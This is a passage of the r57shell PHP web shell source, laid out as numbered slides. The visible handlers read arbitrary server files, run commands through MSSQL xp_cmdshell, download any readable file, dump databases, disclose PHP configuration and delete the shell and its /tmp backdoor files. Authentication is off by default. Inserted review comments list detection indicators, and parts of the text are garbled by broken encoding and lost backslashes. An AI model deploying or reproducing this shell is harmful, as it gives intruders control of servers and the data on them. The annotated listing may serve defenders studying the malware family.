  switch($_POST['cmd'])
  {
  case 'safe_dir':
    $d=@dir($dir);
    if ($d)
     {
     while (false!==($file=$d->read()))
       {
         if ($file=="." || $file=="..") continue;
         @clearstatcache();
         list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime,
$mtime, $ctime, $bsize) = stat($file);
         if($windows){
         echo date("d.m.Y H:i",$mtime);
         if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
         }
         else{
         $owner = @posix_getpwuid($uid);
         $grgid = @posix_getgrgid($gid);
         echo $inode." ";
         echo perms(@fileperms($file));
         printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
         echo date("d.m.Y H:i ",$mtime);
         }
         echo "$filen";
       }
     $d->close();
     }
    else echo $lang[$language._text29];
  break;
  case 'safe_file':
    if(@is_file($_POST['file']))
     {
     $file = @file($_POST['file']);
     if($file)
       {
       $c = @sizeof($file);
       for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
       }
     else echo $lang[$language._text29];
     }
    else echo $lang[$language._text31];
    break;
    case 'test1':
    $ci = @curl_init("file://".$_POST['test1_file']."");
    $cf = @curl_exec($ci);
    echo $cf;
    break;
    case 'test2':
    @include($_POST['test2_file']);
    break;
    case 'test3':
    if(!isset($_POST['test3_port'])||empty($_POST['test3_port']))
{ $_POST['test3_port'] = "3306"; }
  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],
$_POST['test3_mp']);
  if($db)
   {
   if(@mysql_select_db($_POST['test3_md'],$db))
     {
       $sql = "DROP TABLE IF EXISTS temp_r57_table;";
       @mysql_query($sql);
       $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
       @mysql_query($sql);
       $sql = "LOAD DATA INFILE "".$_POST['test3_file']."" INTO TABLE
temp_r57_table;";
       @mysql_query($sql);
       $sql = "SELECT * FROM temp_r57_table;";
       $r = @mysql_query($sql);
       while(($r_sql = @mysql_fetch_array($r))) { echo
@htmlspecialchars($r_sql[0]); }
       $sql = "DROP TABLE IF EXISTS temp_r57_table;";
       @mysql_query($sql);
     }
     else echo "[-] ERROR! Can't select database";
   @mysql_close($db);
   }
  else echo "[-] ERROR! Can't connect to mysql server";
  break;
  case 'test4':
  if(!isset($_POST['test4_port'])||empty($_POST['test4_port']))
{ $_POST['test4_port'] = "1433"; }
  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],
$_POST['test4_mp']);
  if($db)
   {
   if(@mssql_select_db($_POST['test4_md'],$db))
     {
       @mssql_query("drop table r57_temp_table",$db);
       @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
       @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".
$_POST['test4_file']."'",$db);
       $res = mssql_query("select * from r57_temp_table",$db);
       while(($row=@mssql_fetch_row($res)))
        {
        echo $row[0]."rn";
        }
     @mssql_query("drop table r57_temp_table",$db);
     }
     else echo "[-] ERROR! Can't select database";
   @mssql_close($db);
   }
  else echo "[-] ERROR! Can't connect to MSSQL server";
  break;
  case 'test5':
  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
  $lines = file ('/tmp/mb_send_mail');
  foreach ($lines as $line) { echo htmlspecialchars($line)."rn"; }
  break;
  case 'test6':

Nop2

  • 1. <?php / *********************************************************************************** *******************/ /* /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* ############## /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## /* r57shell.php - ñêðèïò Ãà ïõï ïîçâîëÿþùèé âà ì à ¢Ã»Ã¯Ã®Ã«Ãÿòü ñèñòåìÃûå êîìà Ãäû Ãà ñåðâåðå ÷åðåç áà °Ã óçåð /* åû ìîæåòå ñêà ÷à òü Ãîâóþ âåðñèþ Ãà Ãà øåì ñà éòå: http://c99shell.com /* ååðñèÿ: 1.3 (05.03.2006) / *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~*/ /* ÎòäåëüÃà ÿ áëà ãîäà ðÃîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RST/GHC. /* Åñëè ó Ãoà ñ åñòü êà êèå-ëèáî èäåè ïî ïîâîäó òîãî êà êèå åóÃêöèè ñëåäóåò äîáà âèòü â ñêðèïò òî ïèøèòå /* Ãà rst@void.ru. ÃÃñå ïðåäëîæåÃèÿ áóäóò ðà ññìîòðåÃû. / *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~*/ /* (c)oded by 1dt.w0lf /* RST/GHC http://c99shell.com , http://ghc.ru /* ANY MODIFIED REPUBLISHING IS RESTRICTED / *********************************************************************************** *******************/ /* ~~~ Íà ñòðîéêè | Options ~~~ */ // ÃÃûáîð ÿçûêà | Language // $language='ru' - ðóññêèé (russian) // $language='eng' - english (à Ããëèéñêèé) $language='eng'; // ÀóòåÃòèåèêà öèÿ | Authentification // $auth = 1; - ÀóòåÃòèåèêà öèÿ âêëþ÷åÃà ( authentification = On ) // $auth = 0; - ÀóòåÃòèåèêà öèÿ âûêëþ÷åÃà ( authentification = Off )
  • 2. $auth = 0; // Ëîãèà è ïà ðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access) // ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅ ÐÃÃÅÐÅ!!! (CHANGE THIS!!!) // Ëîãèà è ïà ðîëü øèåðóþòñÿ ñ ïîìîùüþ à ëãîà °Ã¨Ã²Ã¬Ã md5, çÃà ÷åÃèÿ ïî óìîë÷à Ãèþ 'r57' // Login & password crypted with md5, default is 'r57' $name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèà ïîëüçîâà òåëÿ (user login) $pass='ec371748dc2da624b35a4f8f685dd122'; // ïà ðîëü ïîëüçîâà òåëÿ (user password) / *********************************************************************************** *******************/ error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $safe_mode = @ini_get('safe_mode'); $version = "1.3"; if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="r57shell"'); header('HTTP/1.0 401 Unauthorized'); exit("<b><a href=http://c99shell.com>r57shell</a> : Access Denied</b>"); } } $head = '<!-- Çäðà âñòâóé Çà ñÿ --> <html> <head> <title>r57shell</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid;
  • 3. BORDER-TOP: #E8481C 1px solid; BORDER-LEFT: #E8481C 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #E8481C 1px solid; BORDER-LEFT: #E8481C 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } .table1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; BACKGROUND-COLOR: #81D1EE; } .td1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; font: 7pt Verdana; } .tr1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; } table { BORDER-RIGHT: #E8481C 1px outset; BORDER-TOP: #E8481C 1px outset; BORDER-LEFT: #E8481C 1px outset; BORDER-BOTTOM: #E8481C 1px outset; BACKGROUND-COLOR: #81D1EE; } input { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: 8pt Verdana; } select { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: 8pt Verdana; } submit { BORDER-RIGHT: buttonhighlight 2px outset; BORDER-TOP: buttonhighlight 2px outset; BORDER-LEFT: buttonhighlight 2px outset; BORDER-BOTTOM: buttonhighlight 2px outset; BACKGROUND-COLOR: #FFFFFF;
  • 4. width: 30%; } textarea { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: Fixedsys bold; } BODY { margin-top: 1px; margin-right: 1px; margin-bottom: 1px; margin-left: 1px; } A:link {COLOR:white; TEXT-DECORATION: none} A:visited { COLOR:white; TEXT-DECORATION: none} A:active {COLOR:white; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE>'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data);
  • 5. $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip';
  • 6. $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user, $this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,
  • 7. $this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; }
  /*
   * select_db(): selects $this->base on the open connection for MySQL and
   * MSSQL. For PostgreSQL and Oracle it returns 1 without a driver call,
   * because connect() already passed the database name for those backends.
   * Returns 0 when selection fails or the backend name is unknown.
   */
  function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0; }
  /*
   * query(): sends $query to the server exactly as given (no parameter
   * binding) and keeps the result handle in $this->res.
   * Return codes in the MySQL branch: 0 = driver returned false and
   * $this->error was set, 1 = a result resource is available, 2 = the
   * statement succeeded without a result resource.
   * For MySQL the statement is prefixed with an SQL comment that wraps a NUL
   * byte (chr(0)).
   * NOTE(review): the reason for that prefix is not visible here. It does
   * mean statements issued by this script carry a fixed, unusual prefix that
   * database query logs or a database firewall can match on.
   * The body continues past the end of this line.
   */
  function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this- >connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error';
  • 8. return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; } return 0; }
  /*
   * get_result(): drains $this->res into $this->rows (one associative array
   * per row), records $this->num_rows and $this->num_fields, frees the result
   * handle and takes the column names from the keys of the first row.
   * Returns 1 when at least one row was read, otherwise 0.
   * The fetch loop assigns before it compares, so the terminating false is
   * appended as a last element of $this->rows; the callers visible in this
   * file iterate up to num_rows and therefore never reach it.
   * The whole result set is held in memory at once.
   * The body continues past the end of this line.
   */
  function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  • 9. @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this- >num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; }
  /*
   * dump(): builds a text dump of one table in $this->dump (an array of
   * lines). Lines 0-5 are a '##' header carrying the backend name, creation
   * time, database and table. For MySQL the SHOW CREATE TABLE output follows,
   * then one INSERT statement per row; the MSSQL and PostgreSQL branches emit
   * INSERT statements only.
   * Returns 0 when $table is empty or any query/fetch step fails.
   * $table is concatenated into the SQL text as given. Row values are passed
   * through mysql_real_escape_string() (MySQL) or addslashes() (others)
   * before being joined into the INSERT.
   * Defender note: a full-table SELECT * issued by the web application's
   * database account, and output beginning with the header text
   * '## MySQL dump', '## MSSQL dump' or '## PostgreSQL dump', are traces of
   * this routine.
   * The body continues past the end of this line.
   */
  function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this- >columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this- >columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) {
  • 10. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this- >columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; }
  /*
   * close(): closes $this->connection with the driver call that matches
   * $this->db. Errors are suppressed and nothing is returned.
   */
  function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; } }
  /*
   * affected_rows(): returns the driver's affected-row count, or 0 for an
   * unknown backend. Every branch passes $this->res.
   * NOTE(review): mysql_affected_rows() takes the connection handle rather
   * than a result handle, so the MySQL branch looks incorrect; confirm
   * before trusting the number it reports.
   */
  function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } }
  /*
   * Image handler: when the img query parameter is set and non-empty, one of
   * two embedded base64 GIFs is selected by using $_GET['img'] directly as
   * the index into $images. The statement continues past the end of this
   * line.
   */
  if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw
  • 11. =='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw =='; @ob_clean(); header("Content-type: image/gif"); echo base64_decode($images[$_GET['img']]); die(); } /* File download handler: runs when POST field cmd equals "download_file" and d_name is non-empty. The path in d_name is opened as given, read in full, optionally wrapped by compress() according to the POST field compress, and returned as an attachment named after basename(d_name). No restriction is applied to the path, so any file readable by the PHP process can leave the host this way. Defender note: the POST field names cmd, d_name and compress, and attachment responses served from a .php URL, are usable indicators in web-server, proxy or WAF logs. */ if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } /* Environment disclosure: when the phpinfo query parameter is present, the full phpinfo() page is printed followed by a BACK link, then the script stops. */ if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ] </b></font></div>"; die(); } /* SQL console: runs when POST field cmd equals "db_query". Backend type, host, port, user, password and database are taken from the POST fields db, db_server, db_port, mysql_l, mysql_p and mysql_db; db_query is split on ';' and every fragment longer than 5 characters is sent through my_sql::query(). The connection target and credentials are request-controlled rather than fixed in configuration. Defender note: these POST field names, and database connections from the web tier to hosts it does not normally talk to, are indicators. The handler continues past the end of this line. */ if ($_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=white><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  • 12. { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>". $sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;". $keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'. $values.'&nbsp;</font></td></tr>'; } echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } }
  /*
   * Re-renders the query form after the results. The submitted connection
   * parameters, including the database password (mysql_p), are echoed back
   * as hidden form fields, and the previous db_query text is placed in the
   * textarea without escaping. The credentials therefore appear in every
   * response body of this page and are re-sent with every POST, which makes
   * them recoverable from captured HTTP traffic or proxy logs when the site
   * is not served over TLS.
   */
  echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(! empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  /*
   * Self-removal: when the delete query parameter is present, the script
   * unlinks the file named by the last path component of PHP_SELF, resolved
   * against the current working directory.
   * Defender note: the script being absent from disk does not rule out
   * earlier use. Web access logs, file-system timelines and backups are the
   * places to look.
   */
  if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); }
  /*
   * Artifact cleanup: when the tmp query parameter is present, a fixed list
   * of helper files is unlinked. The list follows on the next slide of the
   * listing: /tmp/bdpl, /tmp/back, /tmp/bd, /tmp/bd.c, /tmp/dp, /tmp/dpc and
   * /tmp/dpc.c.
   * Defender note: those paths, created or deleted by the web-server account,
   * are file-system indicators for this script family.
   */
  if(isset($_GET['tmp'])) {
  • 13. @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); }
  /*
   * Configuration disclosure: when the phpini query parameter is present,
   * every directive returned by ini_get_all() is printed with its local and
   * master value, then the script stops. This shows the PHP hardening
   * settings of the host to anyone who can reach the script.
   * The two helper functions below are declared inside this if-block.
   */
  if(isset($_GET['phpini'])) { echo $head;
  /*
   * U_value(): turns one ini value into display text. Arrays and objects are
   * rendered with print_r() captured through output buffering; the final
   * string is passed to U_wordwrap().
   * The first test uses a loose comparison with '', which is already true
   * for false and null, so those values are reported as 'no value' and the
   * later 'FALSE' and 'NULL' returns are not reached for them.
   */
  function U_value($value) { if ($value == '') return '<i>no value</i>'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); }
  /*
   * U_wordwrap(): HTML-escapes $str, inserts a <wbr /> break every 100
   * characters, then moves any break that landed inside an HTML entity to
   * just after that entity.
   */
  function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); }
  /* Table of directives; emitted only when ini_get_all() is available. */
  if (@function_exists('ini_get_all')) { $r = ''; echo '<table width=100%>', '<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Directive</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Local Value</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Master Value</b></div></font></td></tr>'; foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'. $key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></ div></font></td></tr>'; } echo $r; echo '</table>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  /*
   * CPU information page, shown when the cpu query parameter is present.
   * The handler continues past the end of this line.
   */
